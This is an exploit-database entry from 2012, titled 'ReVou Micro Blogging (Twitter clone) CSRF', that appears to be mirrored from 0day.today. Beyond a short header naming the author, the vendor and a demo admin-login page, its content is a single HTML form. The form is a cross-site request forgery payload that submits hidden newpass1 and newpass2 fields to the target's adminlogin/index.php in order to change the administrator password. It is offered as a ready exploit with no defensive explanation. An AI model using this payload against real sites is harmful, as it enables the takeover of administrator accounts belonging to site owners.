id: 17717
date: 03/14/2012
title: ReVou Micro Blogging (Twitter clone) CSRF
author: Jonturk75
cves: 

# Exploit Title: ReVou Micro Blogging (Twitter clone) CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/revou-micro-blogging-twitter-clone-php-script/23855/
# Category::  webapps
# Demo : http://www.revou.com/demo/adminlogin
# Greetz: Inj3ct0r Exploit DataBase 1337day.com




<form method="get" action="target.com/[PATH]/adminlogin/index.php"><label for="newpass1"></label>
<input type="hidden" class="wpisz_cos" maxlength="140" id="newpass1" name="newpass1"/>
<input type="hidden" class="wpisz_cos" maxlength="140" id="newpass2" name="newpass2"/>
<input type='submit' name='ok' value='Change' />



#  0day.today [2023-03-24]  #